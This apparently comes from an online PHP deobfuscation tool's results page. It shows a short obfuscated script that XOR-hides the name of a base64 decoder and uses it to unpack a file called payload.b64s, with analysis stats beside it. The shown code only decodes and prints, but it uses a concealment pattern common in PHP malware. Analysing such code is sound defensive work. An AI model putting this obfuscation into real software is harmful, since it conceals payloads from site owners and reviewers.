Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
$b=file_get_contents('payload.b64s'); $f='dguc02Ybceibc'; $d=function($x,$y){for($i=0;$i..
Decoded Output download
<? $b=file_get_contents('payload.b64s');
$f='dguc02Ybceibc';
$d=function($x,$y){for($i=0;$i<strlen($x);$i++){$x[$i]=chr(ord($x[$i])^$y);};return $x;};
$f=$d($f,6);
$c=$f(strtr($b,$f($d('WSLBTCPAT6nLUmrKRS3VS@@US7TPPjb_QPvn_kHm\Q\hgAjwg4~rdk?qe^L|bNP4b5n3ca;;',6)),$f($d('[UHhXEToX0jrcovq`U7taJD{a1P3flf6gZr@SiLGPWXJQGnIQ2zLVi;SWTHVTDTUT3jXUe??',2))));
print($c);
?>
Did this file decode correctly?
Original Code
$b=file_get_contents('payload.b64s');
$f='dguc02Ybceibc';
$d=function($x,$y){for($i=0;$i<strlen($x);$i++){$x[$i]=chr(ord($x[$i])^$y);};return $x;};
$f=$d($f,6);
$c=$f(strtr($b,$f($d('WSLBTCPAT6nLUmrKRS3VS@@US7TPPjb_QPvn_kHm\Q\hgAjwg4~rdk?qe^L|bNP4b5n3ca;;',6)),$f($d('[UHhXEToX0jrcovq`U7taJD{a1P3flf6gZr@SiLGPWXJQGnIQ2zLVi;SWTHVTDTUT3jXUe??',2))));
print($c);
Function Calls
file_get_contents | 1 |
Stats
MD5 | a65ec31c38dcbebaaffa75b3be8e2eeb |
Eval Count | 0 |
Decode Time | 62 ms |